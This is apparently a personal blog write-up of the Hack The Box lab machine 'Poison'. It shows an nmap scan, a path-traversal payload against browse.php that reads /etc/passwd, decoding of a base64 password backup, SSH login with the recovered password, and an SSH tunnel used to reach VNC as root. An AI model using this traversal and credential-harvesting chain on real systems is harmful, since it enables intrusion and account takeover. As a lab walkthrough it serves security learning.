A little bit late but here comes my write up to another box from Hackthebox called Poison.
Solution
Let’s start the attack by scanning with nmap
.
[email protected]:~# nmap -v -sS -A -T4 10.10.10.84
Starting Nmap 7.70 ( https://nmap.org ) at 2018-07-08 09:46 EDT
NSE: Loaded 148 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 09:46
Completed NSE at 09:46, 0.00s elapsed
Initiating NSE at 09:46
Completed NSE at 09:46, 0.00s elapsed
Initiating Ping Scan at 09:46
Scanning 10.10.10.84 [4 ports]
Completed Ping Scan at 09:46, 0.08s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 09:46
Completed Parallel DNS resolution of 1 host. at 09:46, 0.01s elapsed
Initiating SYN Stealth Scan at 09:46
Scanning 10.10.10.84 [1000 ports]
Discovered open port 80/tcp on 10.10.10.84
Discovered open port 22/tcp on 10.10.10.84
Increasing send delay for 10.10.10.84 from 0 to 5 due to max_successful_tryno increase to 5
Increasing send delay for 10.10.10.84 from 5 to 10 due to max_successful_tryno increase to 6
Discovered open port 5911/tcp on 10.10.10.84
Completed SYN Stealth Scan at 09:46, 20.35s elapsed (1000 total ports)
Initiating Service scan at 09:46
Scanning 3 services on 10.10.10.84
Completed Service scan at 09:46, 6.12s elapsed (3 services on 1 host)
Initiating OS detection (try #1) against 10.10.10.84
Retrying OS detection (try #2) against 10.10.10.84
Retrying OS detection (try #3) against 10.10.10.84
Retrying OS detection (try #4) against 10.10.10.84
Retrying OS detection (try #5) against 10.10.10.84
Initiating Traceroute at 09:46
Completed Traceroute at 09:46, 0.06s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 09:46
Completed Parallel DNS resolution of 2 hosts. at 09:46, 0.01s elapsed
NSE: Script scanning 10.10.10.84.
Initiating NSE at 09:46
Completed NSE at 09:46, 7.17s elapsed
Initiating NSE at 09:46
Completed NSE at 09:46, 1.26s elapsed
Nmap scan report for 10.10.10.84
Host is up (0.041s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2 (FreeBSD 20161230; protocol 2.0)
| ssh-hostkey:
| 2048 e3:3b:7d:3c:8f:4b:8c:f9:cd:7f:d2:3a:ce:2d:ff:bb (RSA)
| 256 4c:e8:c6:02:bd:fc:83:ff:c9:80:01:54:7d:22:81:72 (ECDSA)
|_ 256 0b:8f:d5:71:85:90:13:85:61:8b:eb:34:13:5f:94:3b (ED25519)
80/tcp open http Apache httpd 2.4.29 ((FreeBSD) PHP/5.6.32)
| http-methods:
|_ Supported Methods: GET HEAD POST
|_http-server-header: Apache/2.4.29 (FreeBSD) PHP/5.6.32
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
5911/tcp open cpdlc?
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.70%E=4%D=7/8%OT=22%CT=1%CU=40695%PV=Y%DS=2%DC=T%G=Y%TM=5B4215CF
OS:%P=x86_64-pc-linux-gnu)SEQ(SP=109%GCD=1%ISR=10D%TI=Z%CI=Z%II=RI%TS=22)SE
OS:Q(TI=Z%CI=Z%II=RI%TS=21)SEQ(SP=FF%GCD=1%ISR=101%TI=Z%CI=Z%TS=20)SEQ(TI=Z
OS:%CI=Z%TS=1F)OPS(O1=M54DNW6ST11%O2=M54DNW6ST11%O3=M280NW6NNT11%O4=M54DNW6
OS:ST11%O5=M218NW6ST11%O6=M109ST11)WIN(W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=F
OS:FFF%W6=FFFF)ECN(R=Y%DF=Y%T=40%W=FFFF%O=M54DNW6SLL%CC=Y%Q=)T1(R=Y%DF=Y%T=
OS:40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=Y%DF=Y%T=40%W=FFFF%S=O%A=S+%F=AS%O=
OS:M109NW6ST11%RD=0%Q=)T3(R=N)T4(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD
OS:=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0
OS:%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1
OS:(R=Y%DF=N%T=40%IPL=38%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=
OS:S%T=40%CD=S)
Uptime guess: 0.000 days (since Sun Jul 8 09:46:43 2018)
Network Distance: 2 hops
IP ID Sequence Generation: All zeros
Service Info: OS: FreeBSD; CPE: cpe:/o:freebsd:freebsd
TRACEROUTE (using port 587/tcp)
HOP RTT ADDRESS
1 50.58 ms 10.10.14.1
2 42.90 ms 10.10.10.84
NSE: Script Post-scanning.
Initiating NSE at 09:46
Completed NSE at 09:46, 0.00s elapsed
Initiating NSE at 09:46
Completed NSE at 09:46, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 48.73 seconds
Raw packets sent: 1504 (71.306KB) | Rcvd: 1088 (45.674KB)
From here we can see an open ssh
and http
ports. Let’s start by using curl
to get the content of the website.
[email protected]:~# curl 10.10.10.84:80
<html>
<body>
<h1>Temporary website to test local .php scripts.</h1>
Sites to be tested: ini.php, info.php, listfiles.php, phpinfo.php
</body>
</html>
<form action="/browse.php" method="GET">
Scriptname: <input type="text" name="file"><br>
<input type="submit" value="Submit">
</form>
Let’s check if this works by entering the file name phpinfo.php
, listed in the main page.
http://10.10.10.84/browse.php?file=phpinfo.php
Configuration File (php.ini) Path /usr/local/etc
Loaded Configuration File /usr/local/etc/php.ini
Scan this dir for additional .ini files /usr/local/etc/php
But can we get files other as those shown before? Let’s try that by entering the path to /etc/passwd
file.
http://10.10.10.84/browse.php?file=..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
# $FreeBSD: releng/11.1/etc/master.passwd 299365 2016-05-10 12:47:36Z bcr $
#
root:*:0:0:Charlie &:/root:/bin/csh
toor:*:0:0:Bourne-again Superuser:/root:
daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
operator:*:2:5:System &:/:/usr/sbin/nologin
bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin
tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin
kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin
games:*:7:13:Games pseudo-user:/:/usr/sbin/nologin
news:*:8:8:News Subsystem:/:/usr/sbin/nologin
man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin
mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin
bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin
unbound:*:59:59:Unbound DNS Resolver:/var/unbound:/usr/sbin/nologin
proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin
_pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin
_dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin
uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin
auditdistd:*:78:77:Auditdistd unprivileged user:/var/empty:/usr/sbin/nologin
www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
_ypldap:*:160:160:YP LDAP unprivileged user:/var/empty:/usr/sbin/nologin
hast:*:845:845:HAST unprivileged user:/var/empty:/usr/sbin/nologin
nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
_tss:*:601:601:TrouSerS user:/var/empty:/usr/sbin/nologin
messagebus:*:556:556:D-BUS Daemon User:/nonexistent:/usr/sbin/nologin
avahi:*:558:558:Avahi Daemon User:/nonexistent:/usr/sbin/nologin
cups:*:193:193:Cups Owner:/nonexistent:/usr/sbin/nologin
charix:*:1001:1001:charix:/home/charix:/bin/csh
Amazing, now we have a full list of users with potential target called charix
and possibility to view any file on the sytem. But before looking for misconfigurations, I’ve viewed other files from the main page and in the listfiles.php
there is an interesting find. File called pwdbackup.txt
.
http://10.10.10.84/browse.php?file=listfiles.php
Array ( [0] => . [1] => .. [2] => browse.php [3] => index.php [4] => info.php [5] => ini.php [6] => listfiles.php [7] => phpinfo.php [8] => pwdbackup.txt )
Let’s view it.
http://10.10.10.84/browse.php?file=pwdbackup.txt
This password is secure, it's encoded atleast 13 times.. what could go wrong really..
Vm0wd2QyUXlVWGxWV0d4WFlURndVRlpzWkZOalJsWjBUVlpPV0ZKc2JETlhhMk0xVmpKS1IySkVU
bGhoTVVwVVZtcEdZV015U2tWVQpiR2hvVFZWd1ZWWnRjRWRUTWxKSVZtdGtXQXBpUm5CUFdWZDBS
bVZHV25SalJYUlVUVlUxU1ZadGRGZFZaM0JwVmxad1dWWnRNVFJqCk1EQjRXa1prWVZKR1NsVlVW
M040VGtaa2NtRkdaR2hWV0VKVVdXeGFTMVZHWkZoTlZGSlRDazFFUWpSV01qVlRZVEZLYzJOSVRs
WmkKV0doNlZHeGFZVk5IVWtsVWJXaFdWMFZLVlZkWGVHRlRNbEY0VjI1U2ExSXdXbUZEYkZwelYy
eG9XR0V4Y0hKWFZscExVakZPZEZKcwpaR2dLWVRCWk1GWkhkR0ZaVms1R1RsWmtZVkl5YUZkV01G
WkxWbFprV0dWSFJsUk5WbkJZVmpKMGExWnRSWHBWYmtKRVlYcEdlVmxyClVsTldNREZ4Vm10NFYw
MXVUak5hVm1SSFVqRldjd3BqUjJ0TFZXMDFRMkl4WkhOYVJGSlhUV3hLUjFSc1dtdFpWa2w1WVVa
T1YwMUcKV2t4V2JGcHJWMGRXU0dSSGJFNWlSWEEyVmpKMFlXRXhXblJTV0hCV1ltczFSVmxzVm5k
WFJsbDVDbVJIT1ZkTlJFWjRWbTEwTkZkRwpXbk5qUlhoV1lXdGFVRmw2UmxkamQzQlhZa2RPVEZk
WGRHOVJiVlp6VjI1U2FsSlhVbGRVVmxwelRrWlplVTVWT1ZwV2EydzFXVlZhCmExWXdNVWNLVjJ0
NFYySkdjR2hhUlZWNFZsWkdkR1JGTldoTmJtTjNWbXBLTUdJeFVYaGlSbVJWWVRKb1YxbHJWVEZT
Vm14elZteHcKVG1KR2NEQkRiVlpJVDFaa2FWWllRa3BYVmxadlpERlpkd3BOV0VaVFlrZG9hRlZz
WkZOWFJsWnhVbXM1YW1RelFtaFZiVEZQVkVaawpXR1ZHV210TmJFWTBWakowVjFVeVNraFZiRnBW
VmpOU00xcFhlRmRYUjFaSFdrWldhVkpZUW1GV2EyUXdDazVHU2tkalJGbExWRlZTCmMxSkdjRFpO
Ukd4RVdub3dPVU5uUFQwSwo=
Now we can decode it, 13 times as specified in the file. We can use it by hand or write a script, doesn’t matter as the number of encode operations is small enough.
[email protected]:~# echo "Q2hhcml4ITIjNCU2JjgoMA==
> " | base64 -d
Charix!2#4%6&8(0
By the last time, we get, what looks like a password to the charix
account. Let’s try and ssh
into the server with that credentials.
[email protected]:~# ssh [email protected]
Password for [email protected]:
Last login: Sun Jul 8 16:16:28 2018 from 10.10.14.246
FreeBSD 11.1-RELEASE (GENERIC) #0 r321309: Fri Jul 21 02:08:28 UTC 2017
Welcome to FreeBSD!
Release Notes, Errata: https://www.FreeBSD.org/releases/
Security Advisories: https://www.FreeBSD.org/security/
FreeBSD Handbook: https://www.FreeBSD.org/handbook/
FreeBSD FAQ: https://www.FreeBSD.org/faq/
Questions List: https://lists.FreeBSD.org/mailman/listinfo/freebsd-questions/
FreeBSD Forums: https://forums.FreeBSD.org/
Documents installed with the system are in the /usr/local/share/doc/freebsd/
directory, or can be installed later with: pkg install en-freebsd-doc
For other languages, replace "en" with a language code like de or fr.
Show the version of FreeBSD installed: freebsd-version ; uname -a
Please include that output and any error messages when posting questions.
Introduction to manual pages: man man
FreeBSD directory layout: man hier
Edit /etc/motd to change this login announcement.
When you've made modifications to a file in vi(1) and then find that
you can't write it, type ``<ESC>!rm -f %'' then ``:w!'' to force the
write
This won't work if you don't have write permissions to the directory
and probably won't be suitable if you're editing through a symbolic link.
[email protected]:~ % ls -la
total 4728
drwxr-x--- 3 charix charix 512 Jul 8 16:30 .
drwxr-xr-x 3 root wheel 512 Mar 19 16:08 ..
-rw-r----- 1 charix charix 1041 Mar 19 17:16 .cshrc
-rw-rw---- 1 charix charix 0 Jul 8 16:30 .history
-rw-r----- 1 charix charix 254 Mar 19 16:08 .login
-rw-r----- 1 charix charix 163 Mar 19 16:08 .login_conf
-rw-r----- 1 charix charix 379 Mar 19 16:08 .mail_aliases
-rw-r----- 1 charix charix 336 Mar 19 16:08 .mailrc
-rw-r----- 1 charix charix 802 Mar 19 16:08 .profile
-rw-r----- 1 charix charix 281 Mar 19 16:08 .rhosts
-rw-r----- 1 charix charix 849 Mar 19 16:08 .shrc
drwx------ 2 charix charix 512 Jul 8 16:29 .ssh
-rwxr-xr-x 1 charix charix 2211 Jul 8 16:29 kati
-r--r--r-- 1 charix charix 0 Jul 8 16:29 secret
-rw-r----- 1 root charix 166 Mar 19 16:35 secret.zip
-rw-r----- 1 root charix 33 Mar 19 16:11 user.txt
-rw------- 1 charix charix 4734976 Jul 8 16:28 vi.core
[email protected]:~ % cat user.txt
******************************
And we have the first flag. In addition, there is a file called secret.zip
and secret
. I copied the file using scp
, but there was nothing apart from gibberish data. Unziped with passowrd of charix
.
[email protected]:~# scp [email protected]:~/secret.zip secret.zip
Password for [email protected]:
secret.zip 100% 166 3.9KB/s 00:00
[email protected]:~# file secret.zip
secret.zip: Zip archive data, at least v2.0 to extract
[email protected]:~# unzip secret.zip
Archive: secret.zip
[secret.zip] secret password:
extracting: secret
[email protected]:~# cat secret
��[|Ֆ[email protected]:~# file secret
secret: Non-ISO extended-ASCII text, with no line terminators
On further enumeration, I’ve noticed open connection on port 5901
.
[email protected]:~ % netstat -l
Active Internet connections
Proto Recv-Q Send-Q Local Address Foreign Address (state)
tcp4 0 12 localhost.5901 localhost.39582 ESTABLISHED
tcp4 0 0 localhost.39582 localhost.5901 ESTABLISHED
We can try to connect to it with nc
in order to identify the service.
[email protected]:~ % nc 127.0.0.1 5901
RFB 003.008
Some protocol called RFB
? It’s simply VNC!
Firstly, let’s forward the connection, so that we can connect from or local machine.
[email protected]:~# ssh -L 5901:localhost:5901 -N -l charix 10.10.10.84
Password for [email protected]:
One last step came with some struggle, as I could not find correct password for the VNC
. But remember the secret
file? It’s actually a password file, that we can use.
[email protected]:~# vncviewer 127.0.0.1:5901 -p secret
Altough I finished and rooted the box, I can fully recommend the video from Ippsec, in which he showed amazing techniques used to attack the box. Go check it out!